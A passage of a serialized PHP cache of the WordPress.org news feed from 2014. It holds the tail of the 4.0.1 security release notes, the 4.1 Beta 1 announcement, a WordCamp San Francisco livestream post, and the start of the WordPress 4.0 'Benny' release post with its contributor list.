Discovered by <a href=\"http://joncave.co.uk/\">Jon Cave</a>, <a href=\"http://www.miqrogroove.com/\">Robert Chapin</a>, and <a href=\"https://johnblackbourn.com/\">John Blackbourn</a> of the WordPress security team.</li>\n<li>A cross-site request forgery that could be used to trick a user into changing their password.</li>\n<li>An issue that could lead to a denial of service when passwords are checked. Reported by <a href=\"http://www.behindthefirewalls.com/\">Javier Nieto Arevalo</a> and <a href=\"http://www.devconsole.info/\">Andres Rojas Guerrero</a>.</li>\n<li>Additional protections for server-side request forgery attacks when WordPress makes HTTP requests. Reported by Ben Bidner (vortfu).</li>\n<li>An extremely unlikely hash collision could allow a user’s account to be compromised, that also required that they haven’t logged in since 2008 (I wish I were kidding). Reported by <a href=\"http://david.dw-perspective.org.uk\">David Anderson</a>.</li>\n<li>WordPress now invalidates the links in a password reset email if the user remembers their password, logs in, and changes their email address. Reported separately by <a href=\"https://twitter.com/MomenBassel\">Momen Bassel</a>, <a href=\"http://c0dehouse.blogspot.in/\">Tanoy Bose</a>, and <a href=\"https://managewp.com/\">Bojan Slavković of ManageWP</a>.</li>\n</ul>\n<p>Version 4.0.1 also fixes 23 bugs with 4.0, and we’ve made two hardening changes, including better validation of EXIF data we are extracting from uploaded photos. Reported by <a href=\"http://www.securesolutions.no/\">Chris Andrè Dale</a>.</p>\n<p>We appreciated the <a href=\"https://codex.wordpress.org/FAQ_Security\">responsible disclosure</a> of these issues directly to our security team. For more information, see the <a href=\"https://codex.wordpress.org/Version_4.0.1\">release notes</a> or consult the <a href=\"https://core.trac.wordpress.org/log/branches/4.0?rev=30475&stop_rev=29710\">list of changes</a>.</p>\n<p><a href=\"https://wordpress.org/download/\">Download WordPress 4.0.1</a> or venture over to <strong>Dashboard → Updates</strong> and simply click “Update Now”.</p>\n<p><em>Already testing WordPress 4.1? The second beta is now available (<a href=\"https://wordpress.org/wordpress-4.1-beta2.zip\">zip</a>) and it contains these security fixes. For more on 4.1, see <a href=\"https://wordpress.org/news/2014/11/wordpress-4-1-beta-1/\">the beta 1 announcement post</a>.</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/news/2014/11/wordpress-4-0-1/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:48:\"\n \n \n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"WordPress 4.1 Beta 1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/news/2014/11/wordpress-4-1-beta-1/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"https://wordpress.org/news/2014/11/wordpress-4-1-beta-1/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Nov 2014 22:35:34 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:4:\"beta\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3352\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:346:\"Welcome, everyone, to WordPress 4.1 Beta 1! This software is still in development, so we don’t recommend you run it on a production site. Consider setting up a test site just to play with the new version. To test WordPress 4.1, try the WordPress Beta Tester plugin (you’ll want “bleeding edge nightlies”). Or you can […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"John Blackbourn\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:3409:\"<p>Welcome, everyone, to WordPress 4.1 Beta 1!</p>\n<p><strong>This software is still in development,</strong> so we don’t recommend you run it on a production site. Consider setting up a test site just to play with the new version. To test WordPress 4.1, try the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (you’ll want “bleeding edge nightlies”). Or you can <a href=\"//wordpress.org/wordpress-4.1-beta1.zip\">download the beta here</a> (zip).</p>\n<p>WordPress 4.1 is due for release next month, so we need your help with testing. Here are some highlights of what to test:</p>\n<ul>\n<li>Our beautiful new default theme, <a href=\"https://make.wordpress.org/core/2014/09/09/twenty-fifteen/\">Twenty Fifteen</a>. It’s a clean, mobile-first, blog-focused theme designed through simplicity.</li>\n<li>A new <a href=\"https://make.wordpress.org/core/2014/11/11/focus-v2-demo-video/\">distraction-free writing mode for the editor</a>. It’s enabled by default for beta, and we’d love feedback on it.</li>\n<li>The ability to automatically install new language packs right from the General Settings screen (available as long as your site’s filesystem is writable).</li>\n<li>A new inline formatting toolbar for images embedded into posts.</li>\n</ul>\n<p>There have been a lot of changes for developers to test as well:</p>\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2014/10/20/update-on-query-improvements-in-4-1/\">Improvements to meta, date, comment, and taxonomy queries</a>, including complex (nested, multiple relation) queries; and querying comment types (<a href=\"https://core.trac.wordpress.org/ticket/12668\">#12668</a>).</li>\n<li>A single term shared across multiple taxonomies is now split into two when updated. For more, <a href=\"https://make.wordpress.org/core/2014/11/12/an-update-on-the-taxonomy-roadmap/\">see this post</a>, <a href=\"https://core.trac.wordpress.org/ticket/5809\">#5809</a>, and <a href=\"https://core.trac.wordpress.org/ticket/30335\">#30335</a>.</li>\n<li>A new and better way for <a href=\"https://make.wordpress.org/core/2014/10/29/title-tags-in-4-1/\">themes to handle title tags</a>.</li>\n<li>Several <a href=\"https://make.wordpress.org/core/2014/10/27/toward-a-complete-javascript-api-for-the-customizer/\">improvements to the Customizer API</a>, including contextual panels and sections, and JavaScript templates for controls.</li>\n</ul>\n<p>If you want a more in-depth view of what changes have made it into 4.1, <a href=\"https://make.wordpress.org/core/tag/week-in-core/\">check out the weekly review posts</a> on the main development blog.</p>\n<p><strong>If you think you’ve found a bug</strong>, you can post to the <a href=\"https://wordpress.org/support/forum/alphabeta\">Alpha/Beta area</a> in the support forums. We’d love to hear from you! If you’re comfortable writing a reproducible bug report, <a href=\"https://make.wordpress.org/core/reports/\">file one on the WordPress Trac</a>. There, you can also find <a href=\"https://core.trac.wordpress.org/tickets/major\">a list of known bugs</a> and <a href=\"https://core.trac.wordpress.org/query?status=closed&group=component&milestone=4.1\">everything we’ve fixed</a> so far.</p>\n<p>Happy testing!</p>\n<p><em>Twenty Fifteen theme</em><br />\n<em> The beautiful face which hides</em><br />\n<em> Many improvements</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"https://wordpress.org/news/2014/11/wordpress-4-1-beta-1/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:45:\"\n \n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"Watch WordCamp San Francisco Livestream\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/news/2014/10/wcsf-livestream/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/news/2014/10/wcsf-livestream/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 24 Oct 2014 20:18:43 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:9:\"Community\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"WordCamp\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3341\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:381:\"WordCamp San Francisco is the official annual WordPress conference, gathering the community every year since 2006. This is the time when Matt Mullenweg addresses the community in his annual State of the Word presentation – a recap of the year in WordPress and giving us a glimpse into its future. This year the speaker lineup is stellar. There will be talks by […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:17:\"Nikolay Bachiyski\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1975:\"<p><a title=\"2014 edition\" href=\"http://2014.sf.wordcamp.org\">WordCamp San Francisco</a> is the official annual WordPress conference, gathering the community every year <a title=\"An old website for a WordPress long time ago\" href=\"http://2006.sf.wordcamp.org\">since 2006</a>. This is the time when Matt Mullenweg addresses the community in his annual <a href=\"http://wordpress.tv/?s=state+of+the+word\">State of the Word</a> presentation – a recap of the year in WordPress and giving us a glimpse into its future.</p>\n<p>This year the speaker lineup is stellar. There will be talks by three of the lead WordPress developers: <a href=\"http://2014.sf.wordcamp.org/speakers/#wcorg-speaker-andrew-nacin\">Andrew Nacin</a>, <a href=\"http://2014.sf.wordcamp.org/speakers/#wcorg-speaker-helen-hou-sandi\">Helen Hou-Sandí</a>, and <a href=\"http://2014.sf.wordcamp.org/speakers/#wcorg-speaker-mark-jaquith\">Mark Jaquith</a>. We’re also looking forward to speakers like <a href=\"http://2014.sf.wordcamp.org/speakers/#wcorg-speaker-jenny-lawson\">Jenny Lawson</a>, also known as The Bloggess, and <a href=\"http://2014.sf.wordcamp.org/speaker/chris-lema/\">Chris Lema</a>. If you’re at all interested in the web, you will appreciate the appearance of <a href=\"http://2014.sf.wordcamp.org/speakers/#wcorg-speaker-jeff-veen\">Jeff Veen</a> – one of the creators of Google Analytics and co-founder of Typekit.</p>\n<p>Even though San Francisco is far far away for most of you, you can still be part of the fun and watch all presentations in real-time via livestream:</p>\n<p><a href=\"http://2014.sf.wordcamp.org/tickets/\">Get a livestream ticket and watch all talks from WordCamp San Francisco live</a></p>\n<p>If you hurry, you can get one of the special livestream tickets, including a WordCamp San Francisco 2104 t-shirt. You can find all the technical details and start times <a href=\"http://2014.sf.wordcamp.org/live-stream/\">at the WordCamp San Francisco website</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/news/2014/10/wcsf-livestream/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:42:\"\n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"WordPress 4.0 “Benny”\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:41:\"https://wordpress.org/news/2014/09/benny/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"https://wordpress.org/news/2014/09/benny/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 04 Sep 2014 17:05:39 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3296\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:370:\"Version 4.0 of WordPress, named “Benny” in honor of jazz clarinetist and bandleader Benny Goodman, is available for download or update in your WordPress dashboard. While 4.0 is just another number for us after 3.9 and before 4.1, we feel we’ve put a little extra polish into it. This release brings you a smoother writing and management experience […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:23573:\"<p>Version 4.0 of WordPress, named “Benny” in honor of jazz clarinetist and bandleader <a href=\"http://en.wikipedia.org/wiki/Benny_Goodman\">Benny Goodman</a>, is available <a href=\"https://wordpress.org/download/\">for download</a> or update in your WordPress dashboard. While 4.0 is just another number for us after 3.9 and before 4.1, we feel we’ve put a little extra polish into it. This release brings you a smoother writing and management experience we think you’ll enjoy.</p>\n<div id=\"v-bUdzKMro-1\" class=\"video-player\"><embed id=\"v-bUdzKMro-1-video\" src=\"https://v0.wordpress.com/player.swf?v=1.04&guid=bUdzKMro&isDynamicSeeking=true\" type=\"application/x-shockwave-flash\" width=\"692\" height=\"388\" title=\"Introducing WordPress 4.0 "Benny"\" wmode=\"direct\" seamlesstabbing=\"true\" allowfullscreen=\"true\" allowscriptaccess=\"always\" overstretch=\"true\"></embed></div>\n<hr />\n<h2 style=\"text-align: center\">Manage your media with style</h2>\n<p><img class=\"alignnone size-full wp-image-3316\" src=\"https://wordpress.org/news/files/2014/09/media.jpg\" alt=\"Media Library\" width=\"1000\" height=\"586\" />Explore your uploads in a beautiful, endless grid. A new details preview makes viewing and editing any amount of media in sequence a snap.</p>\n<hr />\n<h2 style=\"text-align: center\">Working with embeds has never been easier</h2>\n<div style=\"width: 632px; \" class=\"wp-video\"><!--[if lt IE 9]><script>document.createElement(\'video\');</script><![endif]-->\n<video class=\"wp-video-shortcode\" id=\"video-3296-1\" width=\"632\" height=\"445\" autoplay=\"1\" preload=\"metadata\" controls=\"controls\"><source type=\"video/mp4\" src=\"//s.w.org/images/core/4.0/embed.mp4?_=1\" /><source type=\"video/webm\" src=\"//s.w.org/images/core/4.0/embed.webm?_=1\" /><source type=\"video/ogg\" src=\"//s.w.org/images/core/4.0/embed.ogv?_=1\" /><a href=\"//s.w.org/images/core/4.0/embed.mp4\">//s.w.org/images/core/4.0/embed.mp4</a></video></div>\n<p>Paste in a YouTube URL on a new line, and watch it magically become an embedded video. Now try it with a tweet. Oh yeah — embedding has become a visual experience. The editor shows a true preview of your embedded content, saving you time and giving you confidence.</p>\n<p>We’ve expanded the services supported by default, too — you can embed videos from CollegeHumor, playlists from YouTube, and talks from TED. <a href=\"https://codex.wordpress.org/Embeds\">Check out all of the embeds</a> that WordPress supports.</p>\n<hr />\n<h2 style=\"text-align: center\">Focus on your content</h2>\n<div style=\"width: 632px; \" class=\"wp-video\"><video class=\"wp-video-shortcode\" id=\"video-3296-2\" width=\"632\" height=\"356\" autoplay=\"1\" preload=\"metadata\" controls=\"controls\"><source type=\"video/mp4\" src=\"//s.w.org/images/core/4.0/focus.mp4?_=2\" /><source type=\"video/webm\" src=\"//s.w.org/images/core/4.0/focus.webm?_=2\" /><source type=\"video/ogg\" src=\"//s.w.org/images/core/4.0/focus.ogv?_=2\" /><a href=\"//s.w.org/images/core/4.0/focus.mp4\">//s.w.org/images/core/4.0/focus.mp4</a></video></div>\n<p>Writing and editing is smoother and more immersive with an editor that expands to fit your content as you write, and keeps the formatting tools available at all times.</p>\n<hr />\n<h2 style=\"text-align: center\">Finding the right plugin</h2>\n<p><img class=\"aligncenter size-large wp-image-3309\" src=\"https://wordpress.org/news/files/2014/09/add-plugin1-1024x600.png\" alt=\"Add plugins\" width=\"692\" height=\"405\" /></p>\n<p>There are more than 30,000 free and open source plugins in the WordPress plugin directory. WordPress 4.0 makes it easier to find the right one for your needs, with new metrics, improved search, and a more visual browsing experience.</p>\n<hr />\n<h2 style=\"text-align: center\">The Ensemble</h2>\n<p>This release was led by <a href=\"http://helenhousandi.com\">Helen Hou-Sandí</a>, with the help of these fine individuals. There are 275 contributors with props in this release, a new high. Pull up some Benny Goodman on your music service of choice, as a bandleader or in one of his turns as a classical clarinetist, and check out some of their profiles:</p>\n<p><a href=\"https://profiles.wordpress.org/aaroncampbell\">Aaron D. Campbell</a>, <a href=\"https://profiles.wordpress.org/jorbin\">Aaron Jorbin</a>, <a href=\"https://profiles.wordpress.org/adamsilverstein\">Adam Silverstein</a>, <a href=\"https://profiles.wordpress.org/viper007bond\">Alex Mills (Viper007Bond)</a>, <a href=\"https://profiles.wordpress.org/tellyworth\">Alex Shiels</a>, <a href=\"https://profiles.wordpress.org/alexanderrohmann\">Alexander Rohmann</a>, <a href=\"https://profiles.wordpress.org/aliso\">Alison Barrett</a>, <a href=\"https://profiles.wordpress.org/collinsinternet\">Allan Collins</a>, <a href=\"https://profiles.wordpress.org/amit\">Amit Gupta</a>, <a href=\"https://profiles.wordpress.org/sabreuse\">Amy Hendrix (sabreuse)</a>, <a href=\"https://profiles.wordpress.org/afercia\">Andrea Fercia</a>, <a href=\"https://profiles.wordpress.org/andrezrv\">Andres Villarreal</a>, <a href=\"https://profiles.wordpress.org/zamfeer\">Andrew Mowe</a>, <a href=\"https://profiles.wordpress.org/sumobi\">Andrew Munro (sumobi)</a>, <a href=\"https://profiles.wordpress.org/nacin\">Andrew Nacin</a>, <a href=\"https://profiles.wordpress.org/azaozz\">Andrew Ozz</a>, <a href=\"https://profiles.wordpress.org/andy\">Andy Skelton</a>, <a href=\"https://profiles.wordpress.org/ankit-k-gupta\">Ankit K Gupta</a>, <a href=\"https://profiles.wordpress.org/atimmer\">Anton Timmermans</a>, <a href=\"https://profiles.wordpress.org/arnee\">Arne Brachhold</a>, <a href=\"https://profiles.wordpress.org/aubreypwd\">Aubrey Portwood</a>, <a href=\"https://profiles.wordpress.org/filosofo\">Austin Matzko</a>, <a href=\"https://profiles.wordpress.org/empireoflight\">Ben Dunkle</a>, <a href=\"https://profiles.wordpress.org/kau-boy\">Bernhard Kau</a>, <a href=\"https://profiles.wordpress.org/boonebgorges\">Boone Gorges</a>, <a href=\"https://profiles.wordpress.org/bradyvercher\">Brady Vercher</a>, <a href=\"https://profiles.wordpress.org/bramd\">Bram Duvigneau</a>, <a href=\"https://profiles.wordpress.org/kraftbj\">Brandon Kraft</a>, <a href=\"https://profiles.wordpress.org/krogsgard\">Brian Krogsgard</a>, <a href=\"https://profiles.wordpress.org/brianlayman\">Brian Layman</a>, <a href=\"https://profiles.wordpress.org/rzen\">Brian Richards</a>, <a href=\"https://profiles.wordpress.org/camdensegal\">Camden Segal</a>, <a href=\"https://profiles.wordpress.org/sixhours\">Caroline Moore</a>, <a href=\"https://profiles.wordpress.org/mackensen\">Charles Fulton</a>, <a href=\"https://profiles.wordpress.org/chouby\">Chouby</a>, <a href=\"https://profiles.wordpress.org/chrico\">ChriCo</a>, <a href=\"https://profiles.wordpress.org/c3mdigital\">Chris Olbekson</a>, <a href=\"https://profiles.wordpress.org/chrisl27\">chrisl27</a>, <a href=\"https://profiles.wordpress.org/caxelsson\">Christian Axelsson</a>, <a href=\"https://profiles.wordpress.org/cfinke\">Christopher Finke</a>, <a href=\"https://profiles.wordpress.org/boda1982\">Christopher Spires</a>, <a href=\"https://profiles.wordpress.org/clifgriffin\">Clifton Griffin</a>, <a href=\"https://profiles.wordpress.org/jupiterwise\">Corey McKrill</a>, <a href=\"https://profiles.wordpress.org/corphi\">Corphi</a>, <a href=\"https://profiles.wordpress.org/extendwings\">Daisuke Takahashi</a>, <a href=\"https://profiles.wordpress.org/ghost1227\">Dan Griffiths</a>, <a href=\"https://profiles.wordpress.org/danielbachhuber\">Daniel Bachhuber</a>, <a href=\"https://profiles.wordpress.org/danielhuesken\">Daniel Husken</a>, <a href=\"https://profiles.wordpress.org/redsweater\">Daniel Jalkut (Red Sweater)</a>, <a href=\"https://profiles.wordpress.org/dannydehaan\">Danny de Haan</a>, <a href=\"https://profiles.wordpress.org/dkotter\">Darin Kotter</a>, <a href=\"https://profiles.wordpress.org/koop\">Daryl Koopersmith</a>, <a href=\"https://profiles.wordpress.org/dllh\">Daryl L. L. Houston (dllh)</a>, <a href=\"https://profiles.wordpress.org/davidakennedy\">David A. Kennedy</a>, <a href=\"https://profiles.wordpress.org/dlh\">David Herrera</a>, <a href=\"https://profiles.wordpress.org/dnaber-de\">David Naber</a>, <a href=\"https://profiles.wordpress.org/davidthemachine\">DavidTheMachine</a>, <a href=\"https://profiles.wordpress.org/debaat\">DeBAAT</a>, <a href=\"https://profiles.wordpress.org/dd32\">Dion Hulse</a>, <a href=\"https://profiles.wordpress.org/ocean90\">Dominik Schilling</a>, <a href=\"https://profiles.wordpress.org/donncha\">Donncha O Caoimh</a>, <a href=\"https://profiles.wordpress.org/drewapicture\">Drew Jaynes</a>, <a href=\"https://profiles.wordpress.org/dustyn\">Dustyn Doyle</a>, <a href=\"https://profiles.wordpress.org/eddiemoya\">Eddie Moya</a>, <a href=\"https://profiles.wordpress.org/oso96_2000\">Eduardo Reveles</a>, <a href=\"https://profiles.wordpress.org/edwin-at-studiojoyocom\">Edwin Siebel</a>, <a href=\"https://profiles.wordpress.org/ehg\">ehg</a>, <a href=\"https://profiles.wordpress.org/tmeister\">Enrique Chavez</a>, <a href=\"https://profiles.wordpress.org/erayalakese\">erayalakese</a>, <a href=\"https://profiles.wordpress.org/ericlewis\">Eric Andrew Lewis</a>, <a href=\"https://profiles.wordpress.org/ebinnion\">Eric Binnion</a>, <a href=\"https://profiles.wordpress.org/ericmann\">Eric Mann</a>, <a href=\"https://profiles.wordpress.org/ejdanderson\">Evan Anderson</a>, <a href=\"https://profiles.wordpress.org/eherman24\">Evan Herman</a>, <a href=\"https://profiles.wordpress.org/fab1en\">Fabien Quatravaux</a>, <a href=\"https://profiles.wordpress.org/fahmiadib\">Fahmi Adib</a>, <a href=\"https://profiles.wordpress.org/feedmeastraycat\">feedmeastraycat</a>, <a href=\"https://profiles.wordpress.org/frank-klein\">Frank Klein</a>, <a href=\"https://profiles.wordpress.org/garhdez\">garhdez</a>, <a href=\"https://profiles.wordpress.org/garyc40\">Gary Cao</a>, <a href=\"https://profiles.wordpress.org/garyj\">Gary Jones</a>, <a href=\"https://profiles.wordpress.org/pento\">Gary Pendergast</a>, <a href=\"https://profiles.wordpress.org/garza\">garza</a>, <a href=\"https://profiles.wordpress.org/gauravmittal1995\">gauravmittal1995</a>, <a href=\"https://profiles.wordpress.org/gavra\">Gavrisimo</a>, <a href=\"https://profiles.wordpress.org/georgestephanis\">George Stephanis</a>, <a href=\"https://profiles.wordpress.org/grahamarmfield\">Graham Armfield</a>, <a href=\"https://profiles.wordpress.org/vancoder\">Grant Mangham</a>, <a href=\"https://profiles.wordpress.org/gcorne\">Gregory Cornelius</a>, <a href=\"https://profiles.wordpress.org/bordoni\">Gustavo Bordoni</a>, <a href=\"https://profiles.wordpress.org/harrym\">harrym</a>, <a href=\"https://profiles.wordpress.org/hebbet\">hebbet</a>, <a href=\"https://profiles.wordpress.org/hinnerk\">Hinnerk Altenburg</a>, <a href=\"https://profiles.wordpress.org/hlashbrooke\">Hugh Lashbrooke</a>, <a href=\"https://profiles.wordpress.org/iljoja\">iljoja</a>, <a href=\"https://profiles.wordpress.org/imath\">imath</a>, <a href=\"https://profiles.wordpress.org/ipstenu\">Ipstenu (Mika Epstein)</a>, <a href=\"https://profiles.wordpress.org/issuu\">issuu</a>, <a 